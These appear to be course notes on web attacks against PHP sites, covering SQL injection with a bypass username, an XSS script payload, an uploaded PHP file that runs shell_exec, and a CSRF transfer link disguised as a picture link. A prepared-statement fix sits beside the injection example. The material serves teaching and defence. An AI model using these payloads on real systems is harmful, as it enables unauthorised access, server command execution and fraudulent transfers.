PHP code
PHP code is executed on the server side: Apache interprets the PHP code and, after execution, returns the result to the client. If you run $ wget login.php, login.php executes on the server, generates the result and passes it to the wget tool.
SQL injection
e.g. bypassing the login authentication. This is the PHP code that checks whether the username and password are correct:
function checkuser($username, $password)
{
    $db = "/home/fz2135/sqlite/cs4180";
    $handle = sqlite_open($db) or die("cannot open db");
    // The original used $passwordhash without defining it; the hash function
    // is assumed here. The query is left as written: both values are spliced
    // straight into the SQL text, which is what makes the injection possible.
    $passwordhash = sha1($password);
    $query = "select * from userinfo where userinfo.password = '$passwordhash' AND username ='$username';";
    $result = sqlite_query($handle, $query) or die("die in query");
    sqlite_close($handle);
    if (sqlite_num_rows($result) > 0)
        return true;
    else
        return false;
}
If I put the username as: user1' or '1=1
and the password as a random string,
I could bypass the login authentication, but user1 needs to be a valid username.
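An added example, not code from the original post: it rebuilds the post's concatenated query beside a prepared-statement version and runs both against a constructed in-memory SQLite table (PDO sqlite driver assumed), so the effect of the injected username on each can be checked locally.

```php
<?php
// Added example. Constructs an in-memory userinfo table and compares the
// post's string-concatenated query with a bound-parameter version.

function makeDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE userinfo (username TEXT, password TEXT)');
    // Constructed test row; the password column holds a SHA-256 hex digest.
    $pdo->prepare('INSERT INTO userinfo VALUES (?, ?)')
        ->execute(['user1', hash('sha256', 'correct horse')]);
    return $pdo;
}

// As in the post: the values are spliced into the SQL text, so a single quote
// in the username closes the string literal and the remainder is parsed as SQL.
function checkuser_concat(PDO $pdo, string $username, string $password): bool
{
    $passwordhash = hash('sha256', $password);
    $query = "SELECT * FROM userinfo WHERE password = '$passwordhash' AND username = '$username';";
    return $pdo->query($query)->fetch() !== false;
}

// Fixed form: bound parameters are sent to SQLite separately from the query
// text, so the username is compared literally, quotes and all.
function checkuser_prepared(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare('SELECT 1 FROM userinfo WHERE password = :p AND username = :u');
    $stmt->execute([':p' => hash('sha256', $password), ':u' => $username]);
    return $stmt->fetch() !== false;
}

$pdo = makeDb();
$injected = "user1' or '1=1";   // the username from the post
// Valid credentials against both versions.
var_dump(checkuser_concat($pdo, 'user1', 'correct horse'));
var_dump(checkuser_prepared($pdo, 'user1', 'correct horse'));
// Injected username with a random password against both versions.
var_dump(checkuser_concat($pdo, $injected, 'random'));
var_dump(checkuser_prepared($pdo, $injected, 'random'));
```

Only the concatenated version accepts the injected username; the prepared statement looks for a user literally named user1' or '1=1 and finds none.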
Cross-site-scripting (XSS)
e.g. we could inject JavaScript into a posted message. Post the following message:
<script>alert("XSS")</script>
Arbitrary Code Execution
For example, the vulnerable website allows you to add attachments, like pictures. In this case, you could upload a PHP file, which the Apache server will interpret. In the PHP file, you could use the shell_exec() function:
// Runs a shell command on the web server and returns its output
$output = shell_exec('cp ../../login.php login.txt');
echo $output."<br>";
Cross-Site Request Forgery (CSRF)
You found that Alice transfers 100 dollars to Bob by using the URL
GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1
Then you could create an HTML link and get Alice to click on it:
<a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>
Then 100000 dollars would be transferred into your account.
more info:
- The Open Web Application Security Project (OWASP), "Cross-Site Request Forgery (CSRF)".
  http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
- The Open Web Application Security Project (OWASP), "Top 10 web application vulnerabilities".
  http://www.owasp.org/index.php/Top_10_2007
- milw0rm, "Finding vulnerabilities in PHP scripts".
  http://www.milw0rm.com/papers/381